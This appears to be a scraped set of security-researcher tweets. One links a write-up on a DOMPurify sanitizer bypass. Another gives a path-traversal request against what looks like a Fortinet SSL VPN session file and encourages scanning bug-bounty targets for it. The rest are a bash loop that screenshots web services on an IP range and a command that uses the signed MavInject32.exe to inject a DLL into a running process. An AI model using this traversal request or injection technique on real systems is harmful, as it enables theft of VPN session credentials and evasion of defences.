Another blogpost by @SecurityMB just landed; this time he talks about his recent bypass of DOMPurify using namespace confusion. This is probably the first spec-compliant sanitizer bypass that worked in all browsers ๐
Here you go:
https://t.co/3erc8ifOom
Who else is still scanning BB programs for this? They are still out there! Free๐ฐ๐ฐ
Happy holidays!
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
Bash one liner to take screenshot of web services running on an IP range.
IP="192.168.0"; for p in '80' '443'; do for i in $(seq 0 5); do TAKE_SS=$(cutycapt --url=$IP.$i:$p --out=$IP.$i:$p.png); done; done
๐
Using MavInject32.exe (Microsoft Corp Signed) to load any dll in a running process.
> "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>
cc: @Oddvarmoe@Hexacorn@mattifestation@subTee@tifkin_